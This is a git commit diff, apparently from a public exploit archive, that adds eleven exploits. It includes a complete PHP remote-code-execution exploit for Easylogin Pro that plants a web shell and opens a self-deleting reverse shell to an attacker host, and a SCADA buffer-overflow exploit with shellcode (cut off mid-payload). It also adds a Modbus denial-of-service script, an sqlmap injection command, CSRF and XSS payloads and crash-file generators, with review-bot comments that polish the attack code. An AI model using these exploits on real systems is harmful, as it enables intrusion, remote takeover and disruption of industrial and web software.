DB: 2018-08-21
11 changes to exploits/shellcodes SEIG Modbus 3.4 - Denial of Service (PoC) Zortam MP3 Media Studio 23.95 - Denial of Service (PoC) Restorator 1793 - Denial of Service (PoC) Prime95 29.4b7 - Denial Of Service (PoC) SEIG SCADA System 9 - Remote Code Execution SEIG Modbus 3.4 - Remote Code Execution Easylogin Pro 1.3.0 - Encryptor.php Unserialize Remote Code Execution WordPress Plugin Chained Quiz 1.0.8 - 'answer' SQL Injection MyBB Moderator Log Notes Plugin 1.1 - Cross-Site Request Forgery WordPress Plugin Tagregator 0.6 - Cross-Site Scripting Countly - Persistent Cross-Site Scripting
This commit is contained in:
parent
f4745b8f85
commit
948806b29c
12 changed files with 737 additions and 0 deletions
377
exploits/php/remote/45227.php
Normal file
377
exploits/php/remote/45227.php
Normal file
@ -0,0 +1,377 @@
#!/usr/bin/php
|
||||
<?php
|
||||
/*
|
||||
Easylogin Pro Encryptor.php Unserialize Remote Code Execution Vulnerability
|
||||
Version: 1.3.0
|
||||
Platform: Ubuntu Server 18.04.1
|
||||
|
||||
Bug found by: @f99942
|
||||
Tekniq/exploit by: @steventseeley (mr_me)
|
||||
CVE: CVE-2018-15576
|
||||
|
||||
Notes:
|
||||
======
|
||||
|
||||
- This is not really a security issue I guess, because you need to know the key.
|
||||
But a simple disclosure bug could mean its game over for Easylogin Pro
|
||||
- You will need PHP with threading support to run this exploit
|
||||
- Laravel + Guzzle === lol
|
||||
|
||||
Example:
|
||||
========
|
||||
|
||||
mr_me@pluto:~$ php -m | grep pthreads && php --version
|
||||
pthreads
|
||||
PHP 7.2.2 (cli) (built: Aug 10 2018 01:30:10) ( ZTS DEBUG )
|
||||
Copyright (c) 1997-2018 The PHP Group
|
||||
Zend Engine v3.2.0, Copyright (c) 1998-2018 Zend Technologies
|
||||
with Zend OPcache v7.2.2, Copyright (c) 1999-2018, by Zend Technologies
|
||||
|
||||
mr_me@pluto:~$ ./e.php
|
||||
|
||||
Easylogin Pro <= v1.3.0 Encryptor.php Unserialize Remote Code Execution Vulnerability
|
||||
Bug found by: @f99942
|
||||
Tekniq/exploit by: @steventseeley (mr_me)
|
||||
|
||||
----------------------------------------------------
|
||||
Usage: php ./e.php -t <ip> -c <ip:port>
|
||||
-t: target server (ip with or without port)
|
||||
-c: connectback server (ip and port)
|
||||
Example:
|
||||
php ./e.php -t 172.16.175.136 -c 172.16.175.137:1337
|
||||
----------------------------------------------------
|
||||
mr_me@pluto:~$ ./e.php -t 172.16.175.137 -c 172.16.175.136:1337
|
||||
|
||||
Easylogin Pro <= v1.3.0 Encryptor.php Unserialize Remote Code Execution Vulnerability
|
||||
bug found by: @f99942
|
||||
tekniq/exploit by: @steventseeley (mr_me)
|
||||
|
||||
(+) snap...
|
||||
(+) crackle...
|
||||
(+) pop!
|
||||
(+) connectback from 172.16.175.137 via port 41860
|
||||
|
||||
www-data@target:/var/www/html/uploads$ id;uname -a
|
||||
uid=33(www-data) gid=33(www-data) groups=33(www-data)
|
||||
Linux target 4.15.0-30-generic #32-Ubuntu SMP Thu Jul 26 17:42:43 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
|
||||
www-data@target:/var/www/html/uploads$ ls -la
|
||||
total 12
|
||||
drwxrwxrwx 2 www-data www-data 4096 Aug 12 23:06 .
|
||||
drwxr-xr-x 9 www-data www-data 4096 Aug 9 14:49 ..
|
||||
-rwxrwxrwx 1 root root 13 Dec 12 2017 .gitignore
|
||||
www-data@target:/var/www/html/uploads$ php --version
|
||||
PHP 7.2.7-0ubuntu0.18.04.2 (cli) (built: Jul 4 2018 16:55:24) ( NTS )
|
||||
Copyright (c) 1997-2018 The PHP Group
|
||||
Zend Engine v3.2.0, Copyright (c) 1998-2018 Zend Technologies
|
||||
with Zend OPcache v7.2.7-0ubuntu0.18.04.2, Copyright (c) 1999-2018, by Zend Technologies
|
||||
www-data@target:/var/www/html/uploads$
|
||||
*/
|
||||
|
||||
namespace GuzzleHttp\Cookie;
|
||||
|
||||
// change these to work against your target
|
||||
$key = "OPudCtPyxzAGw8LkQowOoQAc88dvULGB";
|
||||
$path = "/var/www/html";
|
||||
|
||||
class Encrypter {
|
||||
protected $key;
|
||||
protected $cipher;
|
||||
|
||||
public function __construct($key, $cipher = 'AES-256-CBC'){
|
||||
$key = (string) $key;
|
||||
$this->key = $key;
|
||||
$this->cipher = $cipher;
|
||||
}
|
||||
|
||||
public function encrypt($value, $serialize = true){
|
||||
$iv = random_bytes(openssl_cipher_iv_length($this->cipher));
|
||||
$value = openssl_encrypt(
|
||||
$serialize ? serialize($value) : $value,
|
||||
$this->cipher, $this->key, 0, $iv
|
||||
);
|
||||
if ($value === false) {
|
||||
throw new EncryptException('Could not encrypt the data.');
|
||||
}
|
||||
$mac = $this->hash($iv = base64_encode($iv), $value);
|
||||
$json = json_encode(compact('iv', 'value', 'mac'));
|
||||
if (json_last_error() !== JSON_ERROR_NONE) {
|
||||
throw new EncryptException('Could not encrypt the data.');
|
||||
}
|
||||
return base64_encode($json);
|
||||
}
|
||||
|
||||
public function encryptString($value){
|
||||
return $this->encrypt($value, false);
|
||||
}
|
||||
|
||||
protected function hash($iv, $value){
|
||||
return hash_hmac('sha256', $iv.$value, $this->key);
|
||||
}
|
||||
}
|
||||
|
||||
// pop chain
|
||||
interface ToArrayInterface {}
|
||||
|
||||
class SetCookie implements ToArrayInterface {
|
||||
private $data;
|
||||
|
||||
public function __construct(array $data = []){
|
||||
$this->data = $data;
|
||||
}
|
||||
}
|
||||
|
||||
class CookieJar implements ToArrayInterface {
|
||||
private $cookies;
|
||||
|
||||
public function setCookie(SetCookie $cookie){
|
||||
$this->cookies = array($cookie);
|
||||
}
|
||||
}
|
||||
|
||||
class FileCookieJar extends CookieJar {
|
||||
private $filename;
|
||||
|
||||
public function __construct($bd_file, $cbh, $cbp){
|
||||
$this->filename = $bd_file;
|
||||
$this->setCookie(new SetCookie(array(
|
||||
"Value" => '<?php eval(base64_decode($_SERVER[HTTP_SI])); ?>',
|
||||
"Expires" => true,
|
||||
"Discard" => false,
|
||||
)));
|
||||
}
|
||||
}
|
||||
|
||||
class Exploit{
|
||||
private $target;
|
||||
private $targetport;
|
||||
private $cbhost;
|
||||
private $cbport;
|
||||
private $key;
|
||||
private $path;
|
||||
|
||||
public function __construct($t, $tp, $cbh, $cbp, $k, $p){
|
||||
$this->target = $t;
|
||||
$this->targetport = $tp;
|
||||
$this->cbhost = $cbh;
|
||||
$this->cbport = $cbp;
|
||||
$this->key = $k;
|
||||
$this->path = $p;
|
||||
}
|
||||
|
||||
public function run(){
|
||||
|
||||
// its possible to leak the path if app.php contains 'debug' => true
|
||||
// also, uploads is writable by default for avatars
|
||||
$fcj = new FileCookieJar("$this->path/uploads/si.php", $this->cbhost, $this->cbport);
|
||||
$e = new Encrypter($this->key);
|
||||
$this->p = $e->encryptString(serialize($fcj));
|
||||
|
||||
// hardcoded md5 of the class name 'Hazzard\Auth\Auth' for the cookie login
|
||||
$c = $this->do_get("index.php", array("Cookie: login_ac5456751dd3c394383a14228642391e=$this->p"));
|
||||
if ($c === 500){
|
||||
print "(+) pop!\r\n";
|
||||
|
||||
// start our listener
|
||||
$s = new Shell($this->cbport);
|
||||
$s->start();
|
||||
|
||||
// msf reverse shell with some stuff modified
|
||||
$rs = <<<'PHP'
|
||||
@error_reporting(-1);
|
||||
@set_time_limit(0);
|
||||
@ignore_user_abort(1);
|
||||
$dis=@ini_get('disable_functions');
|
||||
if(!empty($dis)){
|
||||
$dis=preg_replace('/[, ]+/', ',', $dis);
|
||||
$dis=explode(',', $dis);
|
||||
$dis=array_map('trim', $dis);
|
||||
}else{
|
||||
$dis=array();
|
||||
}
|
||||
$ipaddr='[cbhost]';
|
||||
$port=[cbport];
|
||||
function PtdSlhY($c){
|
||||
global $dis;
|
||||
if (FALSE !== strpos(strtolower(PHP_OS), 'win' )) {
|
||||
$c=$c." 2>&1\n";
|
||||
}
|
||||
ob_start();
|
||||
system($c);
|
||||
$o=ob_get_contents();
|
||||
ob_end_clean();
|
||||
if (strlen($o) === 0){
|
||||
$o = "NULL";
|
||||
}
|
||||
return $o;
|
||||
}
|
||||
// we disappear like a fart in the wind
|
||||
@unlink("si.php");
|
||||
$nofuncs='no exec functions';
|
||||
$s=@fsockopen("tcp://$ipaddr",$port);
|
||||
while($c=fread($s,2048)){
|
||||
$out = '';
|
||||
if(substr($c,0,3) == 'cd '){
|
||||
chdir(substr($c,3,-1));
|
||||
}else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') {
|
||||
break;
|
||||
}else{
|
||||
$out=PtdSlhY(substr($c,0,-1));
|
||||
if($out===false){
|
||||
fwrite($s, $nofuncs);
|
||||
break;
|
||||
}
|
||||
}
|
||||
fwrite($s,$out);
|
||||
}
|
||||
fclose($s);
|
||||
PHP;
|
||||
$rs = str_replace("[cbhost]", $this->cbhost, $rs);
|
||||
$rs = str_replace("[cbport]", $this->cbport, $rs);
|
||||
$php = base64_encode($rs);
|
||||
$this->do_get("uploads/si.php", array("si: $php"));
|
||||
}
|
||||
}
|
||||
|
||||
private function do_get($p = "index.php", array $h = []){
|
||||
$curl = curl_init();
|
||||
curl_setopt_array($curl, array(
|
||||
CURLOPT_RETURNTRANSFER => 1,
|
||||
CURLOPT_URL => "http://$this->target/$p",
|
||||
CURLOPT_HTTPHEADER => $h,
|
||||
CURLOPT_PORT => (int) $this->targetport
|
||||
));
|
||||
$resp = curl_exec($curl);
|
||||
return curl_getinfo($curl, CURLINFO_HTTP_CODE);
|
||||
}
|
||||
}
|
||||
|
||||
class Shell extends \Thread{
|
||||
private $cbport;
|
||||
|
||||
public function __construct($cbp){
|
||||
$this->cbport = $cbp;
|
||||
}
|
||||
|
||||
public function run(){
|
||||
$sock = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
|
||||
$ret = @socket_bind($sock, 0, (int) $this->cbport);
|
||||
$ret = @socket_listen($sock, 5);
|
||||
$msgsock = @socket_accept($sock);
|
||||
@socket_close($sock);
|
||||
$start = true;
|
||||
$fp = fopen("php://stdin", "r");
|
||||
while(false !== @socket_select($r = array($msgsock))){
|
||||
if ($start === true){
|
||||
if (socket_getpeername($r[0], $a, $p) === true){
|
||||
print "(+) connectback from $a via port $p\r\n";
|
||||
$s = $this->exec_cmd($msgsock, "echo `whoami`@`hostname`:\n");
|
||||
}
|
||||
}
|
||||
$start = false;
|
||||
|
||||
// the pretty shells illusion
|
||||
print "\r\n".$s.$this->exec_cmd($msgsock, "echo `pwd`\n")."$ ";
|
||||
|
||||
// get our command...
|
||||
$c = fgets($fp);
|
||||
|
||||
// if the attacker enters nothing, continue...
|
||||
if (strpos("\n", $c) === 0){
|
||||
continue;
|
||||
}
|
||||
if (strpos($c, "cd") === false){
|
||||
print $this->exec_cmd($msgsock, $c);
|
||||
}elseif (strpos($c, "cd") !== false){
|
||||
$this->exec_cmd($msgsock, $c, false);
|
||||
}
|
||||
if(in_array($c, array("exit\n", "quit\n"))){
|
||||
break;
|
||||
}
|
||||
}
|
||||
fclose($fp);
|
||||
}
|
||||
|
||||
private function exec_cmd($c, $cmd, $ret=true){
|
||||
|
||||
// send our command to the reverse shell
|
||||
@socket_write($c, $cmd, strlen($cmd));
|
||||
|
||||
if ($ret == true){
|
||||
// we don't care to get the shell prompt back...
|
||||
$resp = trim(@socket_read($c, 2048, PHP_BINARY_READ));
|
||||
if ($resp === "NULL"){
|
||||
return "";
|
||||
}else{
|
||||
return $resp;
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
print_r("\r\nEasylogin Pro <= v1.3.0 Encryptor.php Unserialize Remote Code Execution Vulnerability
|
||||
Bug found by: @f99942
|
||||
Tekniq/exploit by: @steventseeley (mr_me)\r\n");
|
||||
|
||||
if ($argc < 3) {
|
||||
print_r("
|
||||
----------------------------------------------------
|
||||
Usage: php ".$argv[0]." -t <ip> -c <ip:port>
|
||||
-t: target server (ip with or without port)
|
||||
-c: connectback server (ip and port)
|
||||
Example:
|
||||
php ".$argv[0]." -t 172.16.175.136 -c 172.16.175.137:1337
|
||||
----------------------------------------------------
|
||||
"); die; }
|
||||
|
||||
function set_args($argv) {
|
||||
$_ARG = array();
|
||||
foreach ($argv as $arg) {
|
||||
if (preg_match("/--([^=]+)=(.*)/", $arg, $reg)) {
|
||||
$_ARG[$reg[1]] = $reg[2];
|
||||
} elseif(preg_match("/^-([a-zA-Z0-9])/", $arg, $reg)) {
|
||||
$_ARG[$reg[1]] = "true";
|
||||
} else {
|
||||
$_ARG["input"][] = $arg;
|
||||
}
|
||||
}
|
||||
return $_ARG;
|
||||
}
|
||||
|
||||
$args = set_args($argv);
|
||||
$host = $args["input"]["1"];
|
||||
$cbsp = $args["input"]["2"];
|
||||
|
||||
if (strpos($host, ":") == true){
|
||||
$host_and_port = explode(":", $host);
|
||||
$host = $host_and_port[0];
|
||||
$port = $host_and_port[1];
|
||||
}else{
|
||||
$port = 80;
|
||||
}
|
||||
|
||||
if (strpos($cbsp, ":") == true){
|
||||
$cbhost_and_cbport = explode(":", $cbsp);
|
||||
$cbhost = $cbhost_and_cbport[0];
|
||||
$cbport = $cbhost_and_cbport[1];
|
||||
}else{
|
||||
$cbport = 1337;
|
||||
}
|
||||
|
||||
$ip_regex = "(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b)";
|
||||
if ((preg_match($ip_regex, $host) === 1) && (preg_match($ip_regex, $cbhost) === 1)){
|
||||
|
||||
// exploit entry
|
||||
$poc = new Exploit($host, $port, $cbhost, $cbport, $key, $path);
|
||||
print "\r\n(+) snap...\r\n(+) crackle...\r\n";
|
||||
$poc->run();
|
||||
}
|
||||
/*
|
||||
eyJpdiI6InFGcWFDMW9aMEFwWmo2XC9RRkhxZ3JBPT0iLCJ2YWx1ZSI6IjdpVExUQWpaYVpu
|
||||
RjVVRElxczg1YUVpSWl2bEtXOVwvY3BVaDFkc0NNY0Y4NkhMME9XNE9PZHJxc0FhUFBlenpi
|
||||
VWtJSUNHWE9RYU5MQjVnOUgzUkt4RGc0QlE4TDNZSnpueFZlblVjM3NnVXFmeE0zSnZaRFA2
|
||||
a2gxU1l2QlVYNW5pUkZEd3c2RFJWYnpqRFkyUmdOQW5vZkVtaFA0Y2JDRW1kUU5mNWtGdmh3
|
||||
WDJWYlBmQU0rTkFwWExQOERWcEZDVTYzU255VEFaTzN4MzhZTEUxWElRbnNCZ1grWm9rN3Vh
|
||||
MzBzSnYrSGpjMmlRRWMxZWVTbDVhN29uOG1RazBJIiwibWFjIjoiOThmYTM5ZDc3M2FlMGVh
|
||||
NTI3ZWI2ZGNkODQ5N2ZmZmExNDA3YjdjYzYzMGRlODY3NDZmMjRkYTBiNmVjMGJmMCJ9
|
||||
*/
|
||||
?>
|
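Review bot: `do_get` leaks its curl handle: `$resp = curl_exec($curl);` is stored and never read, and the handle is never released before the return, so each call leaks a handle until the script exits. Read the status into a local first and close the handle: `$code = curl_getinfo($curl, CURLINFO_HTTP_CODE); curl_close($curl); return $code;`. In `Exploit::run`, `$this->p = $e->encryptString(...)` assigns a property that the class never declares (dynamic properties are deprecated from PHP 8.2); add `private $p;` to the field list or make it a local. In `Shell::run`, the empty-input test has its arguments swapped — `strpos("\n", $c)` searches for `$c` inside a newline — and nothing handles `fgets` returning `false` on stdin EOF, so the loop never terminates once input is closed; use `if ($c === false) break;` followed by `if ($c === "\n") continue;` instead.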
21
exploits/php/webapps/45221.txt
Normal file
21
exploits/php/webapps/45221.txt
Normal file
@ -0,0 +1,21 @@
# Exploit Title: WordPress Plugin Chained Quiz 1.0.8 - 'answer' SQL Injection
|
||||
# Exploit Author: Çlirim Emini
|
||||
# Website: https://www.sentry.co.com
|
||||
# Software Link: https://wordpress.org/plugins/chained-quiz/
|
||||
# Version/s: 1.0.8 and below
|
||||
# Patched Version: 1.0.9
|
||||
# CVE : N/A
|
||||
# WPVULNDB: https://wpvulndb.com/vulnerabilities/9112
|
||||
|
||||
# Vulnerability Description:
|
||||
# WordPress Plugin Plugin Chained Quiz before 1.0.9 allows remote unauthenticated
|
||||
# users to execute arbitrary SQL commands via the 'answer' and 'answers' parameters.
|
||||
|
||||
# Technical details:
|
||||
# Chained Quiz appears to be vulnerable to time-based SQL-Injection.
|
||||
# The issue lies on the $answer backend variable.
|
||||
# Privileges required: None
|
||||
|
||||
# Proof of Concept (PoC):
|
||||
|
||||
sqlmap -u "http://target/wp-admin/admin-ajax.php" --data="answer=1*&question_id=1&quiz_id=1&post_id=1&question_type=radio&points=0&action=chainedquiz_ajax&chainedquiz_action=answer&total_questions=1" --dbms=MySQL --technique T
|
29
exploits/php/webapps/45224.txt
Normal file
29
exploits/php/webapps/45224.txt
Normal file
@ -0,0 +1,29 @@
# Exploit Title: MyBB Moderator Log Notes Plugin 1.1 - Cross-Site Request Forgery
|
||||
# Date: 2018-05-17
|
||||
# Author: 0xB9
|
||||
# Twitter: @0xB9Sec
|
||||
# Software Link: https://community.mybb.com/mods.php?action=view&pid=1105
|
||||
# Version: 1.1
|
||||
# Tested on: Ubuntu 18.04
|
||||
|
||||
# 1. Description:
|
||||
# The plugin allows moderators to save notes and display them in a list in the modCP.
|
||||
# The CSRF allows an attacker to remotely delete all mod notes and mod note logs
|
||||
# in the modCP & ACP.
|
||||
|
||||
# 2. Proof of Concept:
|
||||
|
||||
<html>
|
||||
<body>
|
||||
<-- Deletes mod note logs -->
|
||||
<img style="display:none" src="http://localhost/mybb15/admin/index.php?module=tools-modnoteslog&action=dal" alt="">
|
||||
<-- Deletes mod notes -->
|
||||
<img style="display:none" src="http://localhost/mybb15/admin/index.php?module=tools-modnoteslog&action=dmn" alt="">
|
||||
|
||||
<!-- You can also delete notes individually by the nid (note ID)
|
||||
<img style="display:none" src="http://localhost/mybb15/modcp.php?action=deletenote&nid=3" alt="">
|
||||
<img style="display:none" src="http://localhost/mybb15/modcp.php?action=deletenote&nid=2" alt="">
|
||||
<img style="display:none" src="http://localhost/mybb15/modcp.php?action=deletenote&nid=1" alt="">
|
||||
-->
|
||||
</body>
|
||||
</html>
|
23
exploits/php/webapps/45225.txt
Normal file
23
exploits/php/webapps/45225.txt
Normal file
@ -0,0 +1,23 @@
# Exploit Title: WordPress Plugin Tagregator 0.6 - Cross-Site Scripting
|
||||
# Date: 2018-05-05
|
||||
# Exploit Author: ManhNho
|
||||
# Vendor Homepage: https://wordpress.org/plugins/tagregator/
|
||||
# Software Link: https://downloads.wordpress.org/plugin/tagregator.0.6.zip
|
||||
# Ref: https://pastebin.com/ZGr5tyP2
|
||||
# Version: 0.6
|
||||
# Tested on: CentOS 6.5
|
||||
# CVE : CVE-2018-10752
|
||||
# Category : Webapps
|
||||
|
||||
# 1. Description
|
||||
# WordPress Plugin Tagregator 0.6 - Stored XSS
|
||||
|
||||
# 2. Proof of Concept
|
||||
|
||||
1. Login to admin panel
|
||||
2. Access to Wordpress Tagregator setting, then choose Tweets/Instagram
|
||||
Media/Flickr Post/Google+ Activities and click "Add New" button
|
||||
3. In title field, inject XSS pattern such as:
|
||||
<script>alert('xss')</script> and click Preview button
|
||||
4. This site will response url that will alert popup named xss
|
||||
5. Send this xss url to another administrators, we have same alert
|
34
exploits/php/webapps/45228.txt
Normal file
34
exploits/php/webapps/45228.txt
Normal file
@ -0,0 +1,34 @@
############################################################################
|
||||
# Exploit Title: Countly-server Stored(Persistent) XSS Vulnerability
|
||||
# Date: Monday - 2018 13 August
|
||||
# Author: 10:10AM Team
|
||||
# Discovered By: Sleepy
|
||||
# Software Link: https://github.com/Countly/countly-server
|
||||
# Version: All Version
|
||||
# Category: Web-apps
|
||||
# Security Risk: Critical
|
||||
# Tested on: GNU/Linux Ubuntu 16.04 - win 10
|
||||
############################################################################
|
||||
# Exploit:
|
||||
# Description:
|
||||
#
|
||||
# Attacker can use multiple parameters in the provided link to inject his own data in the database
|
||||
# of this application,the injected data can then be directly viewed in the event logs panel
|
||||
# (manage>logger).
|
||||
# Attacker may use this vulnerability to inject his own payload for attacks like Stored XSS.
|
||||
# The injected payload will be executed everytime that the target page gets visited/refreshed.
|
||||
#
|
||||
# Proof of Concept:
|
||||
#
|
||||
# Injection URL:
|
||||
#
|
||||
# <20> http://[server_ip]:[api_port]/i?api_key=[api_key]¶meter_1=[payload_1]¶meter_2=[payload_2]&etc...
|
||||
#
|
||||
# Execution URL(login to server dashboard and navigate to "event logs" panel):
|
||||
#
|
||||
# <20> http://[server_ip]:[server_port]/dashboard#/[app_key]/manage/logger
|
||||
#
|
||||
#
|
||||
############################################################################
|
||||
# WE ARE: Sleepy({ssleeppyy@gmail.com}), Mikili({mikili.land@gmail.com})
|
||||
############################################################################
|
25
exploits/windows_x86-64/dos/45222.py
Executable file
25
exploits/windows_x86-64/dos/45222.py
Executable file
@ -0,0 +1,25 @@
# Exploit Title: Zortam MP3 Media Studio 23.95 - Denial of Service (PoC)
|
||||
# Author: Gionathan "John" Reale
|
||||
# Discovey Date: 2018-08-19
|
||||
# Homepage: https://www.zortam.com
|
||||
# Software Link: https://www.zortam.com/download.html
|
||||
# Tested Version: 23.95
|
||||
# Tested on OS: Windows 7 x64
|
||||
# Steps to Reproduce: Run the python exploit script, it will create a new
|
||||
# file with the name "exploit.txt" just copy the text inside "exploit.txt"
|
||||
# and start the program. Once inside of the program click "Continue". In the new window paste the content of
|
||||
# "exploit.txt" into the following field: "Select". Click "Ok" and you will see a crash.
|
||||
|
||||
#!/usr/bin/python
|
||||
|
||||
buffer = "A" * 2000
|
||||
|
||||
payload = buffer
|
||||
try:
|
||||
f=open("exploit.txt","w")
|
||||
print "[+] Creating %s bytes evil payload.." %len(payload)
|
||||
f.write(payload)
|
||||
f.close()
|
||||
print "[+] File created!"
|
||||
except:
|
||||
print "File cannot be created"
|
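Review bot: The bare `except:` around the file write swallows every exception — including `KeyboardInterrupt` and `SystemExit` — and prints a message that drops the actual error, while the handle opened by `f=open("exploit.txt","w")` is never closed if `f.write` raises. Use the context manager and catch the I/O error explicitly: `with open("exploit.txt", "w") as f:` for the write, and `except IOError as e:` with `e` included in the printed message. The same block appears unchanged in exploits/windows_x86-64/dos/45223.py and exploits/windows_x86/dos/45226.py. `# Discovey Date` in the header should read `# Discovery Date` in all three files.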
25
exploits/windows_x86-64/dos/45223.py
Executable file
25
exploits/windows_x86-64/dos/45223.py
Executable file
@ -0,0 +1,25 @@
# Exploit Title: Restorator 1793 - Denial of Service (PoC)
|
||||
# Author: Gionathan "John" Reale
|
||||
# Discovey Date: 2018-08-19
|
||||
# Homepage: https://www.bome.com/
|
||||
# Software Link: https://www.bome.com/bome/downloads/Restorator2018_Full_1793.exe
|
||||
# Tested Version: v1793
|
||||
# Tested on OS: Windows 7 x64
|
||||
# Steps to Reproduce: Run the python exploit script, it will create a new
|
||||
# file with the name "exploit.txt" just copy the text inside "exploit.txt"
|
||||
# and start the program. In the new window paste the content of
|
||||
# "exploit.txt" into the following field: "Name". Click "Ok" and you will see a crash.
|
||||
|
||||
#!/usr/bin/python
|
||||
|
||||
buffer = "A" * 4000
|
||||
|
||||
payload = buffer
|
||||
try:
|
||||
f=open("exploit.txt","w")
|
||||
print "[+] Creating %s bytes evil payload.." %len(payload)
|
||||
f.write(payload)
|
||||
f.close()
|
||||
print "[+] File created!"
|
||||
except:
|
||||
print "File cannot be created"
|
31
exploits/windows_x86/dos/45219.py
Executable file
31
exploits/windows_x86/dos/45219.py
Executable file
@ -0,0 +1,31 @@
# Title: SEIG Modbus 3.4 - Denial of Service (PoC)
|
||||
# Author: Alejandro Parodi
|
||||
# Date: 2018-08-17
|
||||
# Vendor Homepage: https://www.schneider-electric.com
|
||||
# Software Link: https://github.com/hdbreaker/Ricnar-Exploit-Solutions/tree/master/Medium/CVE-2013-0662-SEIG-Modbus-Driver-v3.34/VERSION%203.4
|
||||
# Version: v3.4
|
||||
# Tested on: Windows7 x86
|
||||
# CVE: CVE-2013-0662
|
||||
# References:
|
||||
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0662
|
||||
|
||||
import socket
|
||||
import struct
|
||||
import time
|
||||
|
||||
ip = "192.168.127.137"
|
||||
port = 27700
|
||||
con = (ip, port)
|
||||
|
||||
header_padding = "\x00\xAA"
|
||||
header_buffer_size = "\xFF\xFF"
|
||||
header_recv_len = "\x08\xDD" #(header_buffer_size + 1 en el ultimo byte por que se le resta uno)
|
||||
header_end = "\xFF"
|
||||
|
||||
header = header_padding + header_buffer_size + header_recv_len + header_end
|
||||
message = "\x00\x64" + "A" * 2267
|
||||
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
s.connect(con)
|
||||
s.send(header)
|
||||
s.send(message)
|
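Review bot: The socket created with `socket.socket(...)` is never closed after `s.send(message)`, and `import struct` and `import time` are unused in this file. Wrap the connect/send in `try: ... finally: s.close()` (or a `contextlib.closing` block) and drop the unused imports; the same missing close applies to exploits/windows_x86/remote/45218.py and exploits/windows_x86/remote/45220.py. The inline comment on `header_recv_len` is in Spanish; for the repository's readers it should read `# header_buffer_size + 1 in the last byte, because one is subtracted from it`. The raw byte literals such as `"\x00\xAA"` are `str` values that only Python 2's `send` accepts, so the interpreter should be stated with a shebang as the other scripts in this commit do.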
29
exploits/windows_x86/dos/45226.py
Executable file
29
exploits/windows_x86/dos/45226.py
Executable file
@ -0,0 +1,29 @@
# Exploit Title: Prime95 29.4b7 - Denial Of Service (PoC)
|
||||
# Author: Gionathan "John" Reale
|
||||
# Discovey Date: 2018-08-20
|
||||
# Homepage: http://www.mersenne.org
|
||||
# Software Link: http://www.mersenne.org/ftp_root/gimps/p95v294b7.win32.zip
|
||||
# Tested Version: 29.4b7
|
||||
# Tested on OS: Windows 7 32-bit
|
||||
|
||||
# Steps to Reproduce: Run the python exploit script, it will create a new
|
||||
# file with the name "exploit.txt" just copy the text inside "exploit.txt"
|
||||
# and start the program.
|
||||
# In the new window click "Test" > "PrimeNet" > "Connection..".
|
||||
# Now enter some test information into the fields until you reach the last field.
|
||||
# Paste the content of "exploit.txt" into the last field: "Optional proxy password".
|
||||
# Click "Ok" > "Ok" and you will see a crash.
|
||||
|
||||
#!/usr/bin/python
|
||||
|
||||
buffer = "A" * 6000
|
||||
|
||||
payload = buffer
|
||||
try:
|
||||
f=open("exploit.txt","w")
|
||||
print "[+] Creating %s bytes evil payload.." %len(payload)
|
||||
f.write(payload)
|
||||
f.close()
|
||||
print "[+] File created!"
|
||||
except:
|
||||
print "File cannot be created"
|
67
exploits/windows_x86/remote/45218.py
Executable file
67
exploits/windows_x86/remote/45218.py
Executable file
@ -0,0 +1,67 @@
# Title: SEIG SCADA SYSTEM 9 - Remote Code Execution
|
||||
# Author: Alejandro Parodi
|
||||
# Date: 2018-08-17
|
||||
# Vendor Homepage: https://www.schneider-electric.com
|
||||
# Software Link: https://www.schneider-electric.ie/en/download/document/V9_Full_installation_package_register_and_receive_file/
|
||||
# Version: v9
|
||||
# Tested on: Windows7 x86
|
||||
# CVE: CVE-2013-0657
|
||||
# References:
|
||||
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0657
|
||||
|
||||
import socket
|
||||
import struct
|
||||
|
||||
ip = "192.168.0.23"
|
||||
port = 12397
|
||||
con = (ip, port)
|
||||
|
||||
# DoS Payload found in the research (CRUNCHBASE UNEXPECTED PARAMETER)
|
||||
# length = "\x00\x70\x00\x00\x00\x00\x00\x00"
|
||||
# message = "\x00\x70AA\x65\x00\x00\x00AAAAAAAAAAAAAAAA\x00\x00\x00\x00"+"B"*28644
|
||||
# payload = length+message
|
||||
|
||||
# Exploit Magic
|
||||
message_header = struct.pack("<L", 0x6014) + "\x66\x66\x07\x00"
|
||||
message_protocol_data = "\x10\x00\x00\x00" + "\x19" + "\x00\x00\x00\x00\x00" + "\x04" + "\x00\x00\x00" + struct.pack(">H", 0x6000)
|
||||
padding = "B" * 3344
|
||||
eip_safeseh_bypass_address = struct.pack("<L", 0x0F9C520B) # pop, pop, ret to stack payload in exprsrv.dll (Windows Library without SafeSEH)
|
||||
|
||||
# Shellcode: ./msfvenom -a x86 --platform windows -p windows/exec cmd=calc EXITFUNC=thread -e x86/shikata_ga_nai -i 5 -b '\x00\xFF\x0A\x0D' -f python
|
||||
# If EXITFUNC is not defined the application enter in a Loop that kill the VM resources
|
||||
nopsleed = "\x41"*100 # \x90 bad char bypass
|
||||
shellcode = "\xda\xcb\xbd\x0f\x83\x69\x70\xd9\x74\x24\xf4\x58\x31"
|
||||
shellcode += "\xc9\xb1\x4b\x83\xe8\xfc\x31\x68\x14\x03\x68\x1b\x61"
|
||||
shellcode += "\x9c\xa9\xcf\xd8\x3a\xb3\x6e\xfc\x1c\x37\x54\xf6\xc7"
|
||||
shellcode += "\x93\x5d\x47\xb3\xd2\x35\xb1\x3f\x7d\xdc\x42\xd7\x81"
|
||||
shellcode += "\x59\x48\x93\x7b\x98\x70\x2a\x6b\x98\x14\xea\xc5\x54"
|
||||
shellcode += "\x17\x7c\x8d\x25\x69\x60\x27\x1e\xc7\x8a\x6a\xd8\xcf"
|
||||
shellcode += "\xb6\xc3\x9d\x5a\x83\xd6\xea\x88\x14\x7d\x5a\x55\x71"
|
||||
shellcode += "\x90\x85\xb8\x37\x9e\x3e\xd7\x1a\x76\xf8\xb1\xb9\x63"
|
||||
shellcode += "\xb7\xef\xa3\xa6\xc0\xb8\x12\xb4\x18\x62\x1a\xe1\x9e"
|
||||
shellcode += "\x6f\x7e\xa2\x86\x6c\xf7\x3a\x31\xbd\x55\x42\x10\xad"
|
||||
shellcode += "\x89\x16\xa0\xb8\x6a\xd6\x4c\x20\xd9\xad\x81\x58\x77"
|
||||
